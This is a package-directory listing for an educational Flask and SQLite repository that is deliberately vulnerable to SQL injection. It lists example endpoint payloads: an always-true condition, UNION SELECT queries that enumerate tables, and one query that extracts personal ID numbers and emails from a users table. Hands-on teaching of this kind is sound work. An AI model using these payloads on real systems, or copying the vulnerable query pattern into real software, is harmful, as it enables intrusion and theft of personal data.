flaskGitzella

Best Flask open-source libraries and packages

Flask sqlinjection vulnerable
Example of a Flask API vulnerable to SQL Injection with SQLite
Guilherme Latrova
Updated 1 month ago

Flask Vulnerable to SQL Injection 💉🔓

Code style: black try/except style: tryceratops Open in Visual Studio Code

The purpose of this repository is to allow us to explore an API vulnerable to SQL Injection (using Python, Flask, and SQLite).

You're free to play with it as is, but you might have more fun doing it alongside me in a blog post: https://blog.guilatrova.dev/how-sql-injection-attack-works-with-examples/.

Open in Gitpod

You can play with the following endpoints (considering you're running on localhost):

Endpoint Description
/challenges/111.111.111-11 Expected usage
/challenges/' or '1' = '1 Vulnerability proof
/challenges/' AND '1' = '2' UNION SELECT name FROM sqlite_master WHERE type ='table' AND name NOT LIKE 'sqlite_% Breaks server
/challenges/' AND '1' = '2' UNION SELECT 'table_name', name FROM sqlite_master WHERE type = 'table' AND name NOT LIKE 'sqlite_% Queries all tables and fixes broken server
/challenges/' AND '1' = '2' UNION SELECT cpf, email FROM users; -- Use union select to query data from other tables
Tags sql python sqlite
Package Owner
guilatrova
Guilherme Latrova
 Gitzella Github
Package Info
View on Github
Homepage
Package Tags